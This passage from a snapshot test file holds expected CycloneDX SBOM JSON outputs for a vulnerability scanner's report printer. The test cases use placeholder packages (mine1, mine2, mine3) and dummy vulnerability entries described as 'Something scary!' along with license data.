"purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- 
[TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { 
"organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation 
- 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", 
"version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, 
{ "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": 
"pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", 
"references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], 
"credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] 
} --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": 
"1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } 
], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": 
"library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } 
--- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", 
"version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- 
[TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": 